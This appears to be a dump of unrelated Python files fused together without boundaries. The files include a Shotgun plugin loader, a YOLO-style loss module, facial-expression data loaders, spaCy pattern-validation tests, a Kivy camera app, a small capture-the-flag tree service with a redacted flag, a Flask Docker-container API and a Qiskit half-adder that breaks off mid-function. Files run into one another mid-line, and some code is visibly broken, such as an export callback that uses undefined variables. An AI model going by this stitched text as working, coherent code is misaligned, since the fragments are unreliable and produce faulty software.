eventFilter, settings ) # Entity change callbacks eventFilter = { r'Shotgun_%s_New' % settings['sgEntity'] : None, r'Shotgun_%s_Retirement' % settings['sgEntity'] : None, r'Shotgun_%s_Revival' % settings['sgEntity'] : None } reg.logger.debug("Registring %s", eventFilter ) reg.registerCallback( settings['script_name'], settings['script_key'], entityEventCB, eventFilter, settings ) # Get a list of all the existing plugins from Shotgun sgHandle = sg.Shotgun( reg.getEngine().config.getShotgunURL(), settings['script_name'], settings['script_key'] ) plugins = sgHandle.find( settings['sgEntity'], [], ['sg_script_path', 'sg_status_list', 'sg_ignore_projects'] ) reg.logger.debug( "Plugins : %s", plugins ) for p in plugins : if p['sg_script_path'] and p['sg_script_path']['local_path'] and p['sg_status_list'] == 'act' and os.path.isfile( p['sg_script_path']['local_path'] ) : reg.logger.info( "Loading %s", p['sg_script_path']['name'] ) pl = reg.getEngine().loadPlugin( p['sg_script_path']['local_path'], autoDiscover=False ) pl._pm_ignore_projects = p['sg_ignore_projects'] #reg.logger.setLevel(logging.ERROR) def changeEventCB(sg, logger, event, args): """ A callback that treats plugins attributes changes. @param sg: Shotgun instance. @param logger: A preconfigured Python logging.Logger object @param event: A Shotgun event. @param args: The args passed in at the registerCallback call. """ logger.debug("%s" % str(event)) etype = event['event_type'] attribute = event['attribute_name'] entity = event['entity'] if attribute == 'sg_status_list' : logger.info( "Status changed for %s", entity['name'] ) # We need some details to know what to do p = sg.find_one( entity['type'], [[ 'id', 'is', entity['id']]], ['sg_script_path', 'sg_ignore_projects'] ) if p['sg_script_path'] and p['sg_script_path']['local_path'] and os.path.isfile( p['sg_script_path']['local_path'] ) : if event['meta']['new_value'] == 'act' : logger.info('Loading %s', p['sg_script_path']['name']) pl = args['engine'].loadPlugin( p['sg_script_path']['local_path'], autoDiscover=False) pl._pm_ignore_projects = p['sg_ignore_projects'] else : #Disable the plugin logger.info('Unloading %s', p['sg_script_path']['name']) args['engine'].unloadPlugin( p['sg_script_path']['local_path']) elif attribute == 'sg_script_path' : # Should unload and reload the plugin logger.info( "Script path changed for %s", entity['name'] ) # We need some details to know what to do p = sg.find_one( entity['type'], [[ 'id', 'is', entity['id']]], ['sg_status_list', 'sg_script_path', 'sg_ignore_projects'] ) old_val = event['meta']['old_value'] # Unload the plugin if loaded if old_val and 'file_path' in old_val : # Couldn't be loaded if empty or None file_path = old_val['file_path'] # This is not the full path, it is local to the storage # We need to rebuild the old path local_path = { 'darwin' : 'mac_path', 'win32' : 'windows_path', 'linux' : 'linux_path', 'linux2' : 'linux_path' }[ sys.platform] st = sg.find_one( 'LocalStorage', [[ 'id', 'is', old_val['local_storage_id'] ]], [local_path ] ) path = os.path.join( st[ local_path], file_path ) logger.info('Unloading %s', os.path.basename( path )) args['engine'].unloadPlugin( path ) # Reload the plugin if possible if p['sg_script_path'] and p['sg_script_path']['local_path'] and p['sg_status_list'] == 'act' and os.path.isfile( p['sg_script_path']['local_path'] ) : logger.info('Loading %s', p['sg_script_path']['name']) pl = args['engine'].loadPlugin( p['sg_script_path']['local_path'], autoDiscover=False) pl._pm_ignore_projects = p['sg_ignore_projects'] elif attribute == 'sg_ignore_projects' : logger.info( "'Ignore projects' changed for %s", entity['name'] ) p = sg.find_one( entity['type'], [[ 'id', 'is', entity['id']]], ['sg_status_list', 'sg_script_path', 'sg_ignore_projects'] ) if p['sg_script_path'] and p['sg_script_path']['local_path'] : pl = args['engine'].getPlugin( p['sg_script_path']['local_path'] ) if pl : pl._pm_ignore_projects = p['sg_ignore_projects'] def entityEventCB(sg, logger, event, args): """ A callback that treat plugins entities changes @param sg: Shotgun instance. @param logger: A preconfigured Python logging.Logger object @param event: A Shotgun event. @param args: The args passed in at the registerCallback call. """ logger.debug("%s" % str(event)) etype = event['event_type'] attribute = event['attribute_name'] meta = event['meta'] if re.search( 'Retirement$', etype ) : # Unload the plugin p = sg.find_one( meta['entity_type'], [[ 'id', 'is', meta['entity_id']]], ['sg_script_path'], retired_only=True ) if p['sg_script_path'] and p['sg_script_path']['local_path'] : logger.info('Unloading %s', p['sg_script_path']['name']) args['engine'].unloadPlugin( p['sg_script_path']['local_path']) elif re.search( 'Revival$', etype ) or re.search( 'New$', etype ): #Should reload the plugin p = sg.find_one( meta['entity_type'], [[ 'id', 'is', meta['entity_id']]], ['sg_script_path', 'sg_status_list', 'sg_ignore_projects'] ) if p['sg_script_path'] and p['sg_script_path']['local_path'] and p['sg_status_list'] == 'act' and os.path.isfile( p['sg_script_path']['local_path'] ) : logger.info('Loading %s', p['sg_script_path']['name']) pl = args['engine'].loadPlugin( p['sg_script_path']['local_path'], autoDiscover=False) pl._pm_ignore_projects = p['sg_ignore_projects'] from arkexpress.configs import DEBUG_MODE if DEBUG_MODE: BASE_URL = "https://api-dev.ark-xpress.com" else: BASE_URL = "https://api.ark-xpress.com" ACCESS_TOKEN = "{}/oauth/access_token".format(BASE_URL) SHIPMENT_INFO = "{}/ext/v1/getshipmentsinfo".format(BASE_URL) modeling/classification/region_loss.py import time import torch import math import numpy as np import torch.nn as nn import torch.nn.functional as F from torch.autograd import Variable def bbox_anchor_iou(bbox, anchor): # bbox[0] ground truth width, bbox[1] ground truth hight, anchor[0] anchor width, anchor[1], anchor hight inter_area = torch.min(bbox[0], anchor[0]) * torch.min(bbox[1], anchor[1]) union_area = (bbox[0] * bbox[1] + 1e-16) + anchor[0] * anchor[1] - inter_area return inter_area / union_area def box_iou(box1, box2, x1y1x2y2=True): """ Returns the IoU of two bounding boxes """ if not x1y1x2y2: # Transform from center and width to exact coordinates b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2 b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2 b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2 b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2 else: # Get the coordinates of bounding boxes b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3] b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3] # get the corrdinates of the intersection rectangle inter_rect_x1 = torch.max(b1_x1, b2_x1) inter_rect_y1 = torch.max(b1_y1, b2_y1) inter_rect_x2 = torch.min(b1_x2, b2_x2) inter_rect_y2 = torch.min(b1_y2, b2_y2) # Intersection area inter_area = torch.clamp(inter_rect_x2 - inter_rect_x1 + 1, min=0) * torch.clamp( inter_rect_y2 - inter_rect_y1 + 1, min=0 ) # Union Area b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1) b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1) iou = inter_area / (b1_area + b2_area - inter_area + 1e-16) return iou def boxes_iou(box1, box2, x1y1x2y2=True): """ Returns the IoU of two bounding boxes """ if not x1y1x2y2: # Transform from center and width to exact coordinates b1_x1, b1_x2 = box1[..., 0] - box1[..., 2] / 2, box1[..., 0] + box1[..., 2] / 2 b1_y1, b1_y2 = box1[..., 1] - box1[..., 3] / 2, box1[..., 1] + box1[..., 3] / 2 b2_x1, b2_x2 = box2[..., 0] - box2[..., 2] / 2, box2[..., 0] + box2[..., 2] / 2 b2_y1, b2_y2 = box2[..., 1] - box2[..., 3] / 2, box2[..., 1] + box2[..., 3] / 2 else: # Get the coordinates of bounding boxes b1_x1, b1_y1, b1_x2, b1_y2 = box1[..., 0], box1[..., 1], box1[..., 2], box1[..., 3] b2_x1, b2_y1, b2_x2, b2_y2 = box2[..., 0], box2[..., 1], box2[..., 2], box2[..., 3] # get the corrdinates of the intersection rectangle inter_rect_x1 = torch.max(b1_x1, b2_x1) inter_rect_y1 = torch.max(b1_y1, b2_y1) inter_rect_x2 = torch.min(b1_x2, b2_x2) inter_rect_y2 = torch.min(b1_y2, b2_y2) # Intersection area inter_area = torch.clamp(inter_rect_x2 - inter_rect_x1 + 1, min=0) * torch.clamp( inter_rect_y2 - inter_rect_y1 + 1, min=0 ) # Union Area b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1) b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1) iou = inter_area / (b1_area + b2_area - inter_area + 1e-16) return iou def build_targets(pred_boxes, targets, anchors, ignore_thres): # target.shape [nB,4],(center x, center y, w, h) nB = pred_boxes.size(0) nA = pred_boxes.size(1) nH = pred_boxes.size(2) nW = pred_boxes.size(3) obj_mask = torch.cuda.BoolTensor(nB, nA, nH, nW).fill_(False) noobj_mask = torch.cuda.BoolTensor(nB, nA, nH, nW).fill_(True) tx = torch.cuda.FloatTensor(nB, nA, nH, nW).fill_(0) ty = torch.cuda.FloatTensor(nB, nA, nH, nW).fill_(0) tw = torch.cuda.FloatTensor(nB, nA, nH, nW).fill_(0) th = torch.cuda.FloatTensor(nB, nA, nH, nW).fill_(0) tconf = torch.cuda.FloatTensor(nB, nA, nH, nW).fill_(0) gt_x = targets[:,0]*nW # ground truth x gt_y = targets[:,1]*nH # ground truth y gt_w = targets[:,2]*nW # ground truth w gt_h = targets[:,3]*nH # ground truth h gt_box = torch.cuda.FloatTensor(targets.shape) gt_box[:,0] = targets[:,0]*nW # ground truth x gt_box[:,1] = targets[:,1]*nH # ground truth y gt_box[:,2] = targets[:,2]*nW # ground truth w gt_box[:,3] = targets[:,3]*nH # ground truth h grid_x = gt_x.long() # grid x grid_y = gt_y.long() # grid y recall50, recall75, avg_iou = 0.0, 0.0, 0.0 for b in range(nB): anchor_ious = torch.stack([bbox_anchor_iou((gt_w[b],gt_h[b]), anchor) for anchor in anchors]) best_ious, best_n = anchor_ious.max(0) obj_mask[b, best_n, grid_y[b], grid_x[b]] = True noobj_mask[b, best_n, grid_y[b], grid_x[b]] = False # Set noobj mask to zero where iou exceeds ignore threshold gt_boxes = gt_box[b].repeat(nA*nH*nW,1).view(nA,nH,nW,-1) ious = boxes_iou(pred_boxes[b], gt_boxes, x1y1x2y2=False) noobj_mask[b][ious>ignore_thres] = False # Coordinates tx[b, best_n, grid_y[b], grid_x[b]] = gt_x[b] - gt_x[b].floor() ty[b, best_n, grid_y[b], grid_x[b]] = gt_y[b] - gt_y[b].floor() # Width and height tw[b, best_n, grid_y[b], grid_x[b]] = torch.log(gt_w[b] / anchors[best_n][0] + 1e-16) th[b, best_n, grid_y[b], grid_x[b]] = torch.log(gt_h[b] / anchors[best_n][1] + 1e-16) tconf[b, best_n, grid_y[b], grid_x[b]] = 1 iou = box_iou(pred_boxes[b, best_n, grid_y[b], grid_x[b]], gt_box[b], x1y1x2y2=False) if(iou > 0.5): recall50 = recall50 + 1 if(iou > 0.75): recall75 = recall75 + 1 avg_iou += iou.item() scale = 2 - targets[:,2]*targets[:,3] return obj_mask, noobj_mask, scale, tx, ty, tw, th, tconf, recall50/nB, recall75/nB, avg_iou/nB class RegionLoss(nn.Module): def __init__(self, anchors=[[1.4940052559648322,2.3598481287086823],[4.0113013115312155,5.760873975661669]]): super(RegionLoss, self).__init__() self.anchors = torch.cuda.FloatTensor(anchors) self.num_anchors = len(anchors) self.noobject_scale = 1 self.object_scale = 5 self.thresh = 0.6 self.seen = 0 def forward(self, output, targets): nB = output.data.size(0) nA = self.num_anchors nH = output.data.size(2) nW = output.data.size(3) output = output.view(nB, nA, 5, nH, nW).permute(0, 1, 3, 4, 2).contiguous() x = torch.sigmoid(output[...,0]) y = torch.sigmoid(output[...,1]) w = output[...,2] h = output[...,3] conf = torch.sigmoid(output[...,4]) pred_boxes = torch.cuda.FloatTensor(4,nB*nA*nH*nW) grid_x = torch.linspace(0, nW-1, nW).repeat(nH,1).repeat(nB*nA, 1, 1).view(nB*nA*nH*nW).cuda() grid_y = torch.linspace(0, nH-1, nH).repeat(nW,1).t().repeat(nB*nA, 1, 1).view(nB*nA*nH*nW).cuda() anchor_w = self.anchors[:,0] anchor_h = self.anchors[:,1] anchor_w = anchor_w.repeat(nB, 1).repeat(1, 1, nH*nW).view(nB*nA*nH*nW) anchor_h = anchor_h.repeat(nB, 1).repeat(1, 1, nH*nW).view(nB*nA*nH*nW) pred_boxes[0] = x.view(nB*nA*nH*nW) + grid_x pred_boxes[1] = y.view(nB*nA*nH*nW) + grid_y pred_boxes[2] = torch.exp(w).view(nB*nA*nH*nW) * anchor_w pred_boxes[3] = torch.exp(h).view(nB*nA*nH*nW) * anchor_h pred_boxes = pred_boxes.transpose(0,1).contiguous().view(nB,nA,nH,nW,4) #pred_boxes = convert2cpu(pred_boxes.transpose(0,1).contiguous().view(nB,nA,nH,nW,4)) obj_mask, noobj_mask, scale, tx, ty, tw, th, tconf, recall50, recall75, avg_iou = build_targets(pred_boxes, targets.data, self.anchors, self.thresh) tx = Variable(tx.cuda()) ty = Variable(ty.cuda()) tw = Variable(tw.cuda()) th = Variable(th.cuda()) tconf = Variable(tconf.cuda()) obj_mask = Variable(obj_mask.cuda()) noobj_mask = Variable(noobj_mask.cuda()) loss_x = nn.MSELoss()(x[obj_mask]*scale, tx[obj_mask]*scale) loss_y = nn.MSELoss()(y[obj_mask]*scale, ty[obj_mask]*scale) loss_w = nn.MSELoss()(w[obj_mask]*scale, tw[obj_mask]*scale) loss_h = nn.MSELoss()(h[obj_mask]*scale, th[obj_mask]*scale) loss_conf = self.object_scale*nn.MSELoss()(conf[obj_mask], tconf[obj_mask]) + self.noobject_scale * nn.MSELoss()(conf[noobj_mask], tconf[noobj_mask]) loss = loss_x + loss_y + loss_w + loss_h + loss_conf print('loss: x %f, y %f, w %f, h %f, conf %f, total loss %f, recall50 %f, recall75 %f, avg_iou %f' % (loss_x.data, loss_y.data, loss_w.data, loss_h.data, loss_conf.data, loss.data, recall50, recall75, avg_iou)) return loss, recall50, recall75, avg_iou def evaluate(output, targets, anchors = [[1.4940052559648322,2.3598481287086823],[4.0113013115312155,5.760873975661669]]): nB = output.data.size(0) nA = len(anchors) nH = output.data.size(2) nW = output.data.size(3) grid_x = torch.linspace(0, nW-1, nW).repeat(nH,1).repeat(nB*nA, 1, 1).view(nB*nA*nH*nW).cuda() grid_y = torch.linspace(0, nH-1, nH).repeat(nW,1).t().repeat(nB*nA, 1, 1).view(nB*nA*nH*nW).cuda() anchor_w = torch.cuda.FloatTensor(anchors)[:,0] anchor_h = torch.cuda.FloatTensor(anchors)[:,1] anchor_w = anchor_w.repeat(nB, 1).repeat(1, 1, nH*nW).view(nB*nA*nH*nW) anchor_h = anchor_h.repeat(nB, 1).repeat(1, 1, nH*nW).view(nB*nA*nH*nW) output = output.view(nB, nA, 5, nH, nW).permute(0, 1, 3, 4, 2).contiguous() conf = torch.sigmoid(output[...,4]).view(nB*nA*nH*nW) gt_box = torch.cuda.FloatTensor(targets.shape) gt_box[:,0] = targets[:,0]*nW # ground truth x gt_box[:,1] = targets[:,1]*nH # ground truth y gt_box[:,2] = targets[:,2]*nW # ground truth w gt_box[:,3] = targets[:,3]*nH # ground truth h x = torch.sigmoid(output[..., 0]).view(nB*nA*nH*nW) + grid_x y = torch.sigmoid(output[..., 1]).view(nB*nA*nH*nW) + grid_y w = torch.exp(output[..., 2]).view(nB*nA*nH*nW) * anchor_w h = torch.exp(output[..., 3]).view(nB*nA*nH*nW) * anchor_h ious = np.zeros(nB) for b in range(nB): confidence = torch.FloatTensor(nA*nH*nW).copy_(conf[b*nA*nH*nW:(b+1)*nA*nH*nW]).detach().numpy() index = np.argmax(confidence) px = x[b*nA*nH*nW + index] py = y[b*nA*nH*nW + index] pw = w[b*nA*nH*nW + index] ph = h[b*nA*nH*nW + index] ious[b] = box_iou((px,py,pw,ph), gt_box[b], x1y1x2y2=False).item() return np.mean(ious) basic_code/load.py from __future__ import print_function import torch print(torch.__version__) import torch.utils.data import torchvision.transforms as transforms from basic_code import data_generator cate2label = {'CK+':{0: 'Happy', 1: 'Angry', 2: 'Disgust', 3: 'Fear', 4: 'Sad', 5: 'Contempt', 6: 'Surprise', 'Angry': 1,'Disgust': 2,'Fear': 3,'Happy': 0,'Contempt': 5,'Sad': 4,'Surprise': 6}, 'AFEW':{0: 'Happy',1: 'Angry',2: 'Disgust',3: 'Fear',4: 'Sad',5: 'Neutral',6: 'Surprise', 'Angry': 1,'Disgust': 2,'Fear': 3,'Happy': 0,'Neutral': 5,'Sad': 4,'Surprise': 6}} def ckplus_faces_baseline(video_root, video_list, fold, batchsize_train, batchsize_eval): train_dataset = data_generator.TenFold_VideoDataset( video_root=video_root, video_list=video_list, rectify_label=cate2label['CK+'], transform=transforms.Compose([transforms.Resize(224), transforms.RandomHorizontalFlip(), transforms.ToTensor()]), fold=fold, run_type='train' ) val_dataset = data_generator.TenFold_VideoDataset( video_root=video_root, video_list=video_list, rectify_label=cate2label['CK+'], transform=transforms.Compose([transforms.Resize(224), transforms.ToTensor()]), fold=fold, run_type='test' ) train_loader = torch.utils.data.DataLoader( train_dataset, batch_size=batchsize_train, shuffle=True, num_workers=8,pin_memory=True) val_loader = torch.utils.data.DataLoader( val_dataset, batch_size=batchsize_eval, shuffle=False, num_workers=8, pin_memory=True) return train_loader, val_loader def ckplus_faces_fan(video_root, video_list, fold, batchsize_train, batchsize_eval): train_dataset = data_generator.TenFold_TripleImageDataset( video_root=video_root, video_list=video_list, rectify_label=cate2label['CK+'], transform=transforms.Compose([ transforms.Resize(224), transforms.RandomHorizontalFlip(), transforms.ToTensor()]), fold=fold, run_type='train', ) val_dataset = data_generator.TenFold_VideoDataset( video_root=video_root, video_list=video_list, rectify_label=cate2label['CK+'], transform=transforms.Compose([transforms.Resize(224), transforms.ToTensor()]), fold=fold, run_type='test' ) train_loader = torch.utils.data.DataLoader( train_dataset, batch_size=batchsize_train, shuffle=True, num_workers=8,pin_memory=True) val_loader = torch.utils.data.DataLoader( val_dataset, batch_size=batchsize_eval, shuffle=False, num_workers=8, pin_memory=True) return train_loader, val_loader def afew_faces_baseline(root_train, list_train, batchsize_train, root_eval, list_eval, batchsize_eval): train_dataset = data_generator.VideoDataset( video_root=root_train, video_list=list_train, rectify_label=cate2label['AFEW'], transform=transforms.Compose([transforms.Resize(224), transforms.RandomHorizontalFlip(), transforms.ToTensor()]), ) val_dataset = data_generator.VideoDataset( video_root=root_eval, video_list=list_eval, rectify_label=cate2label['AFEW'], transform=transforms.Compose([transforms.Resize(224), transforms.ToTensor()]), csv=False) train_loader = torch.utils.data.DataLoader( train_dataset, batch_size=batchsize_train, shuffle=True, num_workers=8, pin_memory=True) val_loader = torch.utils.data.DataLoader( val_dataset, batch_size=batchsize_eval, shuffle=False, num_workers=8, pin_memory=True) return train_loader, val_loader def afew_faces_fan(root_train, list_train, batchsize_train, root_eval, list_eval, batchsize_eval): train_dataset = data_generator.TripleImageDataset( video_root=root_train, video_list=list_train, rectify_label=cate2label['AFEW'], transform=transforms.Compose([transforms.Resize(224), transforms.RandomHorizontalFlip(), transforms.ToTensor()]), ) val_dataset = data_generator.VideoDataset( video_root=root_eval, video_list=list_eval, rectify_label=cate2label['AFEW'], transform=transforms.Compose([transforms.Resize(224), transforms.ToTensor()]), csv=False) train_loader = torch.utils.data.DataLoader( train_dataset, batch_size=batchsize_train, shuffle=True, num_workers=8, pin_memory=True, drop_last=True) val_loader = torch.utils.data.DataLoader( val_dataset, batch_size=batchsize_eval, shuffle=False, num_workers=8, pin_memory=True) return train_loader, val_loader def model_parameters(_structure, _parameterDir): checkpoint = torch.load(_parameterDir) pretrained_state_dict = checkpoint['state_dict'] model_state_dict = _structure.state_dict() for key in pretrained_state_dict: if ((key == 'module.fc.weight') | (key == 'module.fc.bias')): pass else: model_state_dict[key.replace('module.', '')] = pretrained_state_dict[key] _structure.load_state_dict(model_state_dict) model = torch.nn.DataParallel(_structure).cuda() return model __doc__ = """ Modules containing callback classes for Rhino visualization """ __all__ = ["ExportGeometry"] import warnings import os import sys import numpy as np from numpy import savez from collections import defaultdict from elastica.callback_functions import CallBackBaseClass from elastica_rhino.collector import RhinoExportCollector class ExportGeometry(CallBackBaseClass): def __init__( self, collector: RhinoExportCollector, group: str, ): # Argument Parameters self.collector = collector self.step_skip = collector.step_skip # Data collector self.buffer = defaultdict(list) # Register self.registry = collector.register(group, self.buffer, step_skip) def make_callback(self, system, time, current_step: int): """ Parameters ---------- system : Each part of the system (i.e. rod, rigid body, etc) time : simulation time unit current_step : int simulation step """ if current_step % self.step_skip == 0: position = system.position_collection.copy() radius = system.radius.copy() buffer_size += sys.getsizeof(position) + sys.getsizeof(radius) self.buffer["time"].append(time) # This must exist for collector self.buffer["position"].append(position) self.buffer["radius"].append(radius) self.collector.update(buffer_size) # coding: utf-8 from __future__ import unicode_literals import pytest from spacy.matcher import Matcher from spacy.matcher._schemas import TOKEN_PATTERN_SCHEMA from spacy.errors import MatchPatternError from spacy.util import get_json_validator, validate_json # (pattern, num errors with validation, num errors identified with minimal # checks) TEST_PATTERNS = [ # Bad patterns flagged in all cases ([{"XX": "foo"}], 1, 1), ([{"IS_ALPHA": {"==": True}}, {"LIKE_NUM": None}], 2, 1), ([{"IS_PUNCT": True, "OP": "$"}], 1, 1), ([{"_": "foo"}], 1, 1), ('[{"TEXT": "foo"}, {"LOWER": "bar"}]', 1, 1), ([1, 2, 3], 3, 1), # Bad patterns flagged outside of Matcher ([{"_": {"foo": "bar", "baz": {"IN": "foo"}}}], 1, 0), # Bad patterns not flagged with minimal checks ([{"LENGTH": "2", "TEXT": 2}, {"LOWER": "test"}], 2, 0), ([{"LENGTH": {"IN": [1, 2, "3"]}}, {"POS": {"IN": "VERB"}}], 2, 0), ([{"LENGTH": {"VALUE": 5}}], 1, 0), ([{"TEXT": {"VALUE": "foo"}}], 1, 0), ([{"IS_DIGIT": -1}], 1, 0), ([{"ORTH": -1}], 1, 0), # Good patterns ([{"TEXT": "foo"}, {"LOWER": "bar"}], 0, 0), ([{"LEMMA": {"IN": ["love", "like"]}}, {"POS": "DET", "OP": "?"}], 0, 0), ([{"LIKE_NUM": True, "LENGTH": {">=": 5}}], 0, 0), ([{"LENGTH": 2}], 0, 0), ([{"LOWER": {"REGEX": "^X", "NOT_IN": ["XXX", "XY"]}}], 0, 0), ([{"NORM": "a"}, {"POS": {"IN": ["NOUN"]}}], 0, 0), ([{"_": {"foo": {"NOT_IN": ["bar", "baz"]}, "a": 5, "b": {">": 10}}}], 0, 0), ([{"IS_SENT_START": True}], 0, 0), ([{"SENT_START": True}], 0, 0), ] XFAIL_TEST_PATTERNS = [([{"orth": "foo"}], 0, 0)] @pytest.fixture def validator(): return get_json_validator(TOKEN_PATTERN_SCHEMA) @pytest.mark.parametrize( "pattern", [[{"XX": "y"}, {"LENGTH": "2"}, {"TEXT": {"IN": 5}}]] ) def test_matcher_pattern_validation(en_vocab, pattern): matcher = Matcher(en_vocab, validate=True) with pytest.raises(MatchPatternError): matcher.add("TEST", [pattern]) @pytest.mark.parametrize("pattern,n_errors,_", TEST_PATTERNS) def test_pattern_validation(validator, pattern, n_errors, _): errors = validate_json(pattern, validator) assert len(errors) == n_errors @pytest.mark.xfail @pytest.mark.parametrize("pattern,n_errors,_", XFAIL_TEST_PATTERNS) def test_xfail_pattern_validation(validator, pattern, n_errors, _): errors = validate_json(pattern, validator) assert len(errors) == n_errors @pytest.mark.parametrize("pattern,n_errors,n_min_errors", TEST_PATTERNS) def test_minimal_pattern_validation(en_vocab, pattern, n_errors, n_min_errors): matcher = Matcher(en_vocab) if n_min_errors > 0: with pytest.raises(ValueError): matcher.add("TEST", [pattern]) elif n_errors == 0: matcher.add("TEST", [pattern]) import kivy from kivy.app import App from kivy.uix.floatlayout import FloatLayout from kivy.uix.camera import Camera '''from kivy.uix.label import Label from kivy.uix.gridlayout import GridLayout from kivy.uix.textinput import TextInput from kivy.uix.button import Button from kivy.uix.widget import Widget from kivy.properties import ObjectProperty class Design(Widget): pass def __init__(self, **kwargs): super(Design, self).__init__(**kwargs) self.inside = GridLayout() self.inside.cols = 2 self.rows = 2 self.start = Button(text="Start", font_size=40) self.start.bind(on_press=self.toStart) self.inside.add_widget(self.start) self.stop = Button(text="Stop", font_size=40) self.stop.bind(on_press=self.toStop) self.inside.add_widget(self.stop) self.add_widget(self.inside) def toStart(self): print("first") def toStop(self): print("second")''' class MyApp(App): def build(self): return FloatLayout(), Camera(play=True, index=1, resolution=(640,480)) if __name__ == "__main__": MyApp().run()import sys import time FLAG = "REDACTED" TOTAL_INSERTS = 0 class Node: def __init__(self, data): self.left = None self.right = None self.data = data def insert(self, data): newnode = Node(data) x = self y = None while (x != None): y = x if (data < x.data): x = x.left else: x = x.right if (y == None): y = newnode elif (data < y.data): y.left = newnode else: y.right = newnode return y def findval(self, lkpval, steps=0): if lkpval < self.data: if self.left is None: return False return self.left.findval(lkpval, steps+1) elif lkpval > self.data: if self.right is None: return False return self.right.findval(lkpval, steps+1) else: return True def PrintTree(self, order=""): if self.left: self.left.PrintTree("left") print( self.data, order), if self.right: self.right.PrintTree("right") r = Node('') print(( "Tell me your pleasure.\n" "/a values\n" "/s value\n" "/p\n" "/exit\n" ) ) while(True): inp = input("Your option: ") if(inp.startswith("/a")): values = inp.split(" ")[1].split(";") for val in values: if len(values) > 10001: break TOTAL_INSERTS += 1 r.insert(val) print(TOTAL_INSERTS) sys.stdout.flush() elif(inp.startswith("/s")): print(r.findval(inp.split(" ")[1])) sys.stdout.flush() elif(inp.startswith("/p")): print(r.PrintTree()) sys.stdout.flush() elif(inp.startswith("/exit")): if(r.findval(FLAG)): sys.stdout.flush() break else: break print("Bye!") sys.exit()spindocker/views.py from itertools import chain import os from docker import APIError from flask import request from flask.ext.httpauth import HTTPBasicAuth from flask.ext.restful import reqparse, abort, Resource, fields, marshal, types from spindocker.tasks import audit_containers, start_container, stop_container, remove_container from spindocker.utils import r, client, RUNNING, STOPPED, STOPPING from spindocker import app, api auth = HTTPBasicAuth() users = { "admin": os.environ['SPIN_DOCKER_PASSWORD'], } @app.before_first_request def startup_audit(): audit_containers() @auth.get_password def get_pw(username): """Returns the password specified in 'SPIN_DOCKER_PASSWORD'.""" return users.get(username) container_fields = { 'container_id': fields.String, 'name': fields.String, 'image': fields.String, 'ssh_port': fields.String, 'app_port': fields.String, 'status': fields.String, 'active': fields.String, 'uri': fields.Url('container'), } def abort_if_container_doesnt_exist(container_id): """Checks that a container is found before proceeding with a request.""" if not r.exists('containers:%s' % container_id): abort(404, message="Container %s doesn't exist" % container_id) class ImageList(Resource): decorators = [auth.login_required, ] def __init__(self): self.reqparse = reqparse.RequestParser() super(ImageList, self).__init__() def get(self): """Gets a list of all tagged images for the /images endpoint.""" repo_tag_iter = (image['RepoTags'] for image in client.images()) return [repotag for repotag in chain.from_iterable(repo_tag_iter) \ if repotag != u':'] class ContainerList(Resource): decorators = [auth.login_required, ] def __init__(self): self.reqparse = reqparse.RequestParser() super(ContainerList, self).__init__() def get(self): """Returns all containers for the /containers endpoint.""" self.reqparse.add_argument('audit', type=types.boolean, default=False,) args = self.reqparse.parse_args() if args['audit']: audit_containers() containers = [r.hgetall(container) for container in r.keys('containers:*')] return [marshal(c, container_fields) for c in containers] def post(self): """Creates a new container based on a POST to /containers.""" self.reqparse.add_argument( 'image', type=str, required=True, help='Image cannot be blank') args = self.reqparse.parse_args() # Check that image exists try: image = client.inspect_image(args['image']) except APIError: abort(500, message="Image %s not found on this server" % args['image']) if not image['container_config']['ExposedPorts']: abort(500, message="This image does not expose any ports. \ Use the EXPOSE command in your dockerfile to specify some.") # Create and start the container try: result = client.create_container(image=args['image'], detach=True, ) container_id = result['Id'] container = start_container(container_id) except APIError as exception: abort(500, message=exception.explanation) return marshal(container, container_fields), 201 class Container(Resource): decorators = [auth.login_required, ] def __init__(self): self.reqparse = reqparse.RequestParser() self.reqparse.add_argument('status', type=str) super(Container, self).__init__() def get(self, container_id): """Returns information about a single container.""" abort_if_container_doesnt_exist(container_id) container = r.hgetall('containers:%s' % container_id) return marshal(container, container_fields) def patch(self, container_id): """Updates information on a single container. Currently just status.""" args = self.reqparse.parse_args() if 'status' in args: if args['status'] == STOPPED: stop_container.delay(container_id) r.hset('containers:%s' % container_id, 'status', STOPPING) elif args['status'] == RUNNING: try: start_container(container_id) except APIError as exception: abort(500, message=exception.explanation) container = r.hgetall('containers:%s' % container_id) return marshal(container, container_fields) def delete(self, container_id): """Stops and deletes a single container.""" abort_if_container_doesnt_exist(container_id) remove_container.delay(container_id) return '', 204 # Setup the Api resource routing here api.add_resource(ImageList, '/v1/images', endpoint='images') api.add_resource(ContainerList, '/v1/containers', endpoint='containers') api.add_resource( Container, '/v1/containers/', endpoint='container') @app.route('/v1/check-in', methods=['POST']) def check_in(): """Processes activity reports from the containers.""" active = request.form['active'] container_ip = request.remote_addr container_id = r.get('ips:%s' % container_ip) if container_id is not None: r.hset('containers:%s' % container_id, 'active', active) return '' Mariana02Santos/Python0 d = int(input('Por quantos dias o carro foi alugado? ')) k = float(input('Quantos km foram rodados? ')) v = 60 * d + 0.15 * k print('O valor a ser pago é' , v) #!/usr/bin/env python3 """ Build a half-adder quantum circuit that takes two bits as input, encodes them into qubits, then runs the half-adder circuit calculating the sum and carry qubits, observed over 1000 runs of the experiment . References: - https://en.wikipedia.org/wiki/Adder_(electronics) - https://qiskit.org/textbook/ch-states/atoms-computation.html#4.2-Remembering-how-to-add- """ import qiskit as q def half_adder(bit0: int, bit1: int) -> q.result.counts.Counts: """ >>> half_adder(0, 0) {'00': 1000} >>> half_adder(0, 1) {'01': 1000} >>> half_adder(1, 0) {'01': 1000} >>> half_adder(1, 1) {'10': 1000} """ # Use Aer's qasm_simulator simulator = q.Aer.get_backend("qasm_simulator") qc_ha = q.QuantumCircuit(4, 2) # encode inputs in qubits 0 and 1 if bit0 == 1: qc_ha.x(0) if bit1 == 1: qc_ha.x(1) qc_ha.barrier() # 